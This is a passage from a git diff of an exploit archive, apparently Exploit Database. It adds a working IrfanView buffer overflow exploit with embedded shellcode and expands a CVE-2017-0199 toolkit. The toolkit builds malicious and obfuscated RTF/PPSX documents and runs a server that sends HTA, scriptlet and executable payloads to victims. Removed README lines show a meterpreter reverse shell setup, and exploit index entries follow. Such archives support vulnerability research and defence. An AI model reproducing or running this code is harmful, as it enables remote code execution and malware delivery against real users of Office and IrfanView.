+textfile.close() \ No newline at end of file diff --git a/exploits/windows/local/44218.py b/exploits/windows/local/44218.py new file mode 100755 index 000000000..6943ea8df --- /dev/null +++ b/exploits/windows/local/44218.py @@ -0,0 +1,75 @@ +#!/usr/bin/python + +# +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Exploit Title: IrfanView 4.50 Email PlugIn - Local Buffer Overflow (SEH Unicode) +# Date: 02-07-2018 +# Vulnerable Software: IrfanView 4.50 Email PlugIn +# Vendor Homepage: http://www.irfanview.com/ +# Version: 4.50 +# Software Link: http://www.irfanview.info/files/irfanview_450.exe +# Software Link: http://www.irfanview.info/files/irfanview_plugins_450.zip +# Tested Windows 7 SP1 x86 +# +# More reliable result if .NET and updates installed prior to application being installed +# +# +# PoC +# 1. generate irfan.txt, copy contents to clipboard +# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg) +# 3. select Options, Send by Email, Settings +# 4. paste contents from clipboard into Full Name and select OK +# 5. application crashes +# 6. pop calc +# ****if calc doesn't pop on first try, repeat steps 2-4 until it does :/ +# + +filename="irfan.txt" + +#junk to offset +junk = "\x41"*262 + +#popad +nseh = "\x61\x62" + +#0x00500102 pop esi pop ebx ret +#unicode possible ansi transform(s) : 0050008A->00500106,ascii {PAGE_EXECUTE_READ} [i_view32.exe] +seh = "\x8a\x50" + +valign = ( +"\x55" #push ebp +"\x47" #align +"\x58" #pop eax +"\x47" #align +"\x05\x14\x11" #add eax,400 +"\x47" #align +"\x2d\x13\x11" #sub eax,300 +"\x47" #align +"\x50" #push eax +"\x47" #align +"\xc3" #retn +) + +#nops to shellcode +nops = "\x71" * 109 + +#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX +calc = ( +"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" +"ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHE2KPKPM0C0U9IU01I02D4K0P004" +"K0RLLTK0RLT4KT2NHLOH7OZO601KOVLOLQQSLLBNLMPWQHOLMM197K2KBQB0WTK0RN0DKPJOLDK0LLQR" +"XIS18M1J121TK1IMPKQYC4KPILXJCOJQ9TKOD4KKQ8VP1KOFL91XOLMM1WWP8IPD5ZVLCCMKHOKSMO42" +"UK428DKPXNDM1ICBFTKLLPKDKB8MLM19CDKLD4KKQHP3YQ4O4MTQKQK1Q291JPQKOIP1OQOPZ4KLRJK4M" +"1MRJM14MU5WBM0M0M0R0QX014K2OTGKO9EGKL06UFBB6C85VF5GM5MKOJ5OLKVSLKZE0KKIPBUM57KQ7M" +"CSB2ORJM0PSKOIEBCC1BL1SNN2E2XC5M0AA" +) + +#necessary fill +fill = "\x71"*1000 + +buffer = junk + nseh + seh + valign + nops + calc + fill + +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/exploits/windows/remote/41894.py b/exploits/windows/remote/41894.py index e8c39719e..121cd8e8d 100755 --- a/exploits/windows/remote/41894.py +++ b/exploits/windows/remote/41894.py @@ -1,103 +1,16 @@ +#!/usr/bin/env python ''' -## Exploit toolkit CVE-2017-0199 - v2.0 (https://github.com/bhdresh/CVE-2017-0199) ## + ## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ## - - -Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration. - - -### Video tutorial - -https://youtu.be/42LjG7bAvpg - - -### Release note: - -Introduced following capabilities to the script - - - Generate Malicious RTF file using toolkit - - Run toolkit in an exploitation mode as tiny HTA + Web server - -Version: Python version 2.7.13 - -### Future release: - -Working on following feature - - - Automatically send generated malicious RTF to victim using email spoofing - -### Example: - -- Step 1: Generate malicious RTF file using following command and send it to victim - - Syntax: - - # python cve-2017-0199_toolkit.py -M gen -w -u - - Example: - - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc - - -- Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler - - Example: - - Generate Payload: - - # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe - - Start Handler: - - # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run" - - -- Step 3: Start toolkit in exploitation mode to deliver payloads - - Syntax: - - # python cve-2017-0199_toolkit.py -M exp -e -l - - Example: - - # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe - - - -### Command line arguments: - - # python cve-2017-0199_toolkit.py -h - - This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE) - - Modes: - - -M gen Generate Malicious RTF file only - - Generate malicious RTF file: - - -w Name of malicious RTF file (Share this file with victim). - - -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. - - For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and - - will be requested once victim will open malicious RTF file. - -M exp Start exploitation mode - - Exploitation: - - -p Local port number. - - -e The path of an executable file / meterpreter shell / payload which needs to be executed on target. - - -l Local path of an executable file / meterpreter shell / payload (If payload is hosted locally). - - +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41894.zip ''' +import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile +from random import randint +from random import choice +from string import ascii_uppercase +from zipfile import ZipFile, ZIP_STORED, ZipInfo -import os,sys,thread,socket,sys,getopt BACKLOG = 50 # how many pending connections queue will hold MAX_DATA_RECV = 999999 # max number of bytes we receive at once @@ -110,35 +23,47 @@ def main(argv): global docuri global payloadurl global payloadlocation + global custom global mode + global obfuscate + global payloadtype filename = '' docuri = '' payloadurl = '' payloadlocation = '' + custom = '' port = int("80") host = '' mode = '' + obfuscate = int("0") + payloadtype = 'rtf' + # Capture command line arguments try: - opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation="]) + opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:t:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","custom=","obfuscate=","payloadtype="]) except getopt.GetoptError: print 'Usage: python '+sys.argv[0]+' -h' sys.exit(2) for opt, arg in opts: if opt == '-h': - print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)\n" + print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Office RCE)\n" print "Modes:\n" - print " -M gen Generate Malicious RTF file only\n" - print " Generate malicious RTF file:\n" - print " -w Name of malicious RTF file (Share this file with victim).\n" - print " -u The path to an hta file. Normally, this should be a domain or IP where this tool is running.\n" - print " For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and\n" - print " will be requested once victim will open malicious RTF file.\n" + print " -M gen Generate Malicious file only\n" + print " Generate malicious payload:\n" + print " -w Name of malicious RTF/PPSX file (Share this file with victim).\n" + print " -u The path to an HTA/SCT file. Normally, this should be a domain or IP where this tool is running.\n" + print " For example, http://attacker.com/test.doc (This URL will be included in malicious file and\n" + print " will be requested once victim will open malicious RTF/PPSX file.\n" + print " -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" + print " -x 0|1 (RTF only) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n" print " -M exp Start exploitation mode\n" print " Exploitation:\n" - print " -p Local port number.\n" + print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" + print " -H Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n" + print " NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\".\n" + print " -p Local port number.\n" print " -e The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n" - print " -l Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).\n" + print " -l If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.\n" sys.exit() elif opt in ("-M","--mode"): mode = arg @@ -152,6 +77,12 @@ def main(argv): payloadurl = arg elif opt in ("-l", "--payloadlocation"): payloadlocation = arg + elif opt in ("-H","--custom"): + custom = arg + elif opt in ("-x","--obfuscate"): + obfuscate = int(arg) + elif opt in ("-t","--payloadtype"): + payloadtype = arg if "gen" in mode: if (len(filename)<1): print 'Usage: python '+sys.argv[0]+' -h' @@ -159,24 +90,63 @@ def main(argv): if (len(docuri)<1): print 'Usage: python '+sys.argv[0]+' -h' sys.exit() - print "Generating payload" - generate_exploit_rtf() + if (len(payloadtype)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if payloadtype.upper() == 'RTF': + if obfuscate == 1: + print "Generating obfuscated RTF file.\n" + generate_exploit_obfuscate_rtf() + sys.exit() + if obfuscate == 0: + print "Generating normal RTF payload.\n" + generate_exploit_rtf() + sys.exit() + sys.exit() + if payloadtype.upper() == 'PPSX': + print "Generating normal PPSX payload.\n" + generate_exploit_ppsx() + sys.exit() + if payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX': + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() mode = 'Finished' if "exp" in mode: - if (len(payloadurl)<1): + if payloadtype.upper() == 'RTF': + if (len(custom)>1): + print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect" + exploitation_rtf() + sys.exit() + if (len(payloadurl)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if (len(payloadurl)>1 and len(payloadlocation)<1): + print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect" + exploitation_rtf() + sys.exit() + print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect" + exploitation_rtf() + mode = 'Finished' + if payloadtype.upper() == 'PPSX': + if (len(custom)>1): + print "Running exploit mode (Deliver Custom SCT) - waiting for victim to connect" + exploitation_ppsx() + sys.exit() + if (len(payloadurl)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if (len(payloadurl)>1 and len(payloadlocation)<1): + print "Running exploit mode (Deliver SCT with remote payload) - waiting for victim to connect" + exploitation_ppsx() + sys.exit() + print "Running exploit mode (Deliver SCT + Local Payload) - waiting for victim to connect" + exploitation_ppsx() + mode = 'Finished' + if not "Finished" in mode: print 'Usage: python '+sys.argv[0]+' -h' sys.exit() - if (len(payloadlocation)<1): - print 'Usage: python '+sys.argv[0]+' -h' - sys.exit() - print "Running exploit mode - waiting for victim to connect" - exploitation() - mode = 'Finished' - if not "Finished" in mode: - print 'Usage: python '+sys.argv[0]+' -h' - sys.exit() def generate_exploit_rtf(): - # Preparing malicious Doc + # Preparing malicious RTF s = docuri docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s) docuri_pad_len = 224 - len(docuri_hex) @@ -221,7 +191,181 @@ def generate_exploit_rtf(): f.close() print "Generated "+filename+" successfully" -def exploitation(): + + +def generate_exploit_obfuscate_rtf(): + # Preparing malicious obfuscated RTF + var1 = " " + var2 = "\r\n" + var3 = "\t" + var4 = ''.join(choice(ascii_uppercase) for i in range(randint(3,10))) + var5 = "{\*\\"+var4+"}" + var6 = binascii.b2a_hex(os.urandom(15)) + #var6 = "0011002e1faa" + s = docuri + docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s) + docuri_pad_len = 224 - len(docuri_hex) + docuri_pad = "0"*docuri_pad_len + new_docuri_hex = docuri_hex.replace('00', '{\*\\'+var6+'}00') + uri_hex = "010000020900000001000000000000000000000000000000a4000000"+"e"+var5*randint(0,10)+"0"+var5*randint(0,10)+"c"+var5*randint(0,10)+"9"+var5*randint(0,10)+"e"+var5*randint(0,10)+"a"+var5*randint(0,10)+"7"+var5*randint(0,10)+"9"+var5*randint(0,10)+"f"+var5*randint(0,10)+"9"+var5*randint(0,10)+"b"+var5*randint(0,10)+"a"+var5*randint(0,10)+"c"+var5*randint(0,10)+"e"+var5*randint(0,10)+"1"+var5*randint(0,10)+"1"+var5*randint(0,10)+"8"+var5*randint(0,10)+"c"+var5*randint(0,10)+"8"+var5*randint(0,10)+"2"+var5*randint(0,10)+"0"+var5*randint(0,10)+"0"+var5*randint(0,10)+"a"+var5*randint(0,10)+"a"+var5*randint(0,10)+"0"+var5*randint(0,10)+"0"+var5*randint(0,10)+"4"+var5*randint(0,10)+"b"+var5*randint(0,10)+"a"+var5*randint(0,10)+"9"+var5*randint(0,10)+"0"+var5*randint(0,10)+"b"+var5*randint(0,10)+"8c000000"+new_docuri_hex+docuri_pad+"00000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff0609020000000000c00000000000004600000000ffffffff0000000000000000906660a637b5d201000000000000000000000000000000000000000000000000100203000d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" + + payload = "{\\rtv0"+var1*randint(0,100)+"\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\n" + payload += "{\\info\n" + payload += "{\\author }\n" + payload += "{\\operator }\n" + payload += "}\n" + payload += "{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\n" + payload += "{\n" + payload += "{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\n" + payload += "{\\*\\objclass \\'57\\'6f\\'72\\'64.Document.8}\n" + payload += "{\\*\\objdata 0"+var2*randint(0,10)+var3*randint(0,10)+"1"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"5"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"2"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0\n" + payload += "090000004f4c45324c696e6b000000000000000000000a0000\n" + payload += "d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\n" + + payload += "6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\n" + payload += "000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\n" + payload += "0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\n" + payload += "00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += uri_hex+"\n" + payload += "0105000000000000}\n" + payload += "{\\result {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\n" + payload += "{\\*\\datastore }\n" + payload += "}\n" + f = open(filename, 'w') + f.write(payload) + f.close() + print "Generated obfuscated "+filename+" successfully" + +def generate_exploit_ppsx(): +# Preparing malicious PPSX + shutil.copy2('template/template.ppsx', filename) + class UpdateableZipFile(ZipFile): + """ + Add delete (via remove_file) and update (via writestr and write methods) + To enable update features use UpdateableZipFile with the 'with statement', + Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates + """ + + class DeleteMarker(object): + pass + + def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False): + # Init base + super(UpdateableZipFile, self).__init__(file, mode=mode, + compression=compression, + allowZip64=allowZip64) + # track file to override in zip + self._replace = {} + # Whether the with statement was called + self._allow_updates = False + + def writestr(self, zinfo_or_arcname, bytes, compress_type=None): + if isinstance(zinfo_or_arcname, ZipInfo): + name = zinfo_or_arcname.filename + else: + name = zinfo_or_arcname + # If the file exits, and needs to be overridden, + # mark the entry, and create a temp-file for it + # we allow this only if the with statement is used + if self._allow_updates and name in self.namelist(): + temp_file = self._replace[name] = self._replace.get(name, + tempfile.TemporaryFile()) + temp_file.write(bytes) + # Otherwise just act normally + else: + super(UpdateableZipFile, self).writestr(zinfo_or_arcname, + bytes, compress_type=compress_type) + + def write(self, filename, arcname=None, compress_type=None): + arcname = arcname or filename + # If the file exits, and needs to be overridden, + # mark the entry, and create a temp-file for it + # we allow this only if the with statement is used + if self._allow_updates and arcname in self.namelist(): + temp_file = self._replace[arcname] = self._replace.get(arcname, + tempfile.TemporaryFile()) + with open(filename, "rb") as source: + shutil.copyfileobj(source, temp_file) + # Otherwise just act normally + else: + super(UpdateableZipFile, self).write(filename, + arcname=arcname, compress_type=compress_type) + + def __enter__(self): + # Allow updates + self._allow_updates = True + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + # call base to close zip file, organically + try: + super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb) + if len(self._replace) > 0: + self._rebuild_zip() + finally: + # In case rebuild zip failed, + # be sure to still release all the temp files + self._close_all_temp_files() + self._allow_updates = False + + def _close_all_temp_files(self): + for temp_file in self._replace.itervalues(): + if hasattr(temp_file, 'close'): + temp_file.close() + + def remove_file(self, path): + self._replace[path] = self.DeleteMarker() + + def _rebuild_zip(self): + tempdir = tempfile.mkdtemp() + try: + temp_zip_path = os.path.join(tempdir, 'new.zip') + with ZipFile(self.filename, 'r') as zip_read: + # Create new zip with assigned properties + with ZipFile(temp_zip_path, 'w', compression=self.compression, + allowZip64=self._allowZip64) as zip_write: + for item in zip_read.infolist(): + # Check if the file should be replaced / or deleted + replacement = self._replace.get(item.filename, None) + # If marked for deletion, do not copy file to new zipfile + if isinstance(replacement, self.DeleteMarker): + del self._replace[item.filename] + continue + # If marked for replacement, copy temp_file, instead of old file + elif replacement is not None: + del self._replace[item.filename] + # Write replacement to archive, + # and then close it (deleting the temp file) + replacement.seek(0) + data = replacement.read() + replacement.close() + else: + data = zip_read.read(item.filename) + zip_write.writestr(item, data) + # Override the archive with the updated one + shutil.move(temp_zip_path, self.filename) + finally: + shutil.rmtree(tempdir) + + with UpdateableZipFile(filename, "a") as o: + o.writestr("ppt/slides/_rels/slide1.xml.rels", "\ + ") + print "Generated "+filename+" successfully" + + +def exploitation_rtf(): print "Server Running on ",host,":",port @@ -268,13 +412,30 @@ def server_thread(conn, client_addr): print "Invalid request from "+client_addr[0] conn.close() sys.exit(1) + # check if custom HTA flag is set + if (len(custom)>1): + print "Received request for custom HTA from "+client_addr[0] + try: + size = os.path.getsize(custom) + except OSError: + print "Unable to read exe - "+custom + conn.close() + sys.exit(1) + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n" + with open(custom) as fin: + data +=fin.read() + conn.send(data) + conn.close() + sys.exit(1) + conn.close() + sys.exit(1) check_exe_request = url.find('.exe') if (check_exe_request > 0): print "Received request for payload from "+client_addr[0] try: size = os.path.getsize(payloadlocation) except OSError: - print "Unable to read"+payloadlocation + print "Unable to read "+payloadlocation conn.close() sys.exit(1) data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" @@ -301,5 +462,96 @@ def server_thread(conn, client_addr): sys.exit(1) except socket.error, ex: print ex + + +def exploitation_ppsx(): + + print "Server Running on ",host,":",port + + try: + # create a socket + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + # associate the socket to host and port + s.bind((host, port)) + + # listenning + s.listen(BACKLOG) + + except socket.error, (value, message): + if s: + s.close() + print "Could not open socket:", message + sys.exit(1) + + # get the connection from client + while 1: + conn, client_addr = s.accept() + + # create a thread to handle request + thread.start_new_thread(server_thread, (conn, client_addr)) + + s.close() + +def server_thread(conn, client_addr): + + # get the request from browser + try: + request = conn.recv(MAX_DATA_RECV) + if (len(request) > 0): + # parse the first line + first_line = request.split('\n')[0] + + # get method + method = first_line.split(' ')[0] + # get url + try: + url = first_line.split(' ')[1] + except IndexError: + print "Invalid request from "+client_addr[0] + conn.close() + sys.exit(1) + # check if custom SCT flag is set + if (len(custom)>1): + print "Received request for custom SCT from "+client_addr[0] + try: + size = os.path.getsize(custom) + except OSError: + print "Unable to read custom SCT file - "+custom + conn.close() + sys.exit(1) + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n" + with open(custom) as fin: + data +=fin.read() + conn.send(data) + conn.close() + sys.exit(1) + conn.close() + sys.exit(1) + check_exe_request = url.find('.exe') + if (check_exe_request > 0): + print "Received request for payload from "+client_addr[0] + try: + size = os.path.getsize(payloadlocation) + except OSError: + print "Unable to read"+payloadlocation + conn.close() + sys.exit(1) + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" + with open(payloadlocation) as fin: + data +=fin.read() + conn.send(data) + conn.close() + sys.exit(1) + if method in ['GET', 'get']: + print "Received GET method from "+client_addr[0] + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 1000\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" + conn.send(data) + conn.close() + sys.exit(1) + except socket.error, ex: + print ex + + if __name__ == '__main__': main(sys.argv[1:]) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bfd5f934d..8721c2edd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5883,6 +5883,8 @@ id,file,description,date,author,type,platform,port 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64, 44213,exploits/hardware/dos/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,qwertyoruiop,dos,hardware, 44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple, +44221,exploits/windows/dos/44221.py,"SEGGER embOS/IP FTP Server 3.22 - Denial of Service",2018-03-02,hyp3rlinx,dos,windows, +44222,exploits/windows/dos/44222.txt,"DualDesk 20 - 'Proxy.exe' Denial of Service",2018-03-02,hyp3rlinx,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -7037,7 +7039,7 @@ id,file,description,date,author,type,platform,port 14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows, 14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows, 14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows, -14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak",2010-08-03,jailbreakme,local,ios, +14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'",2010-08-03,jailbreakme,local,ios, 14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows, 14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows, 14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",local,windows, @@ -7059,7 +7061,7 @@ id,file,description,date,author,type,platform,port 14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows, 14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows, 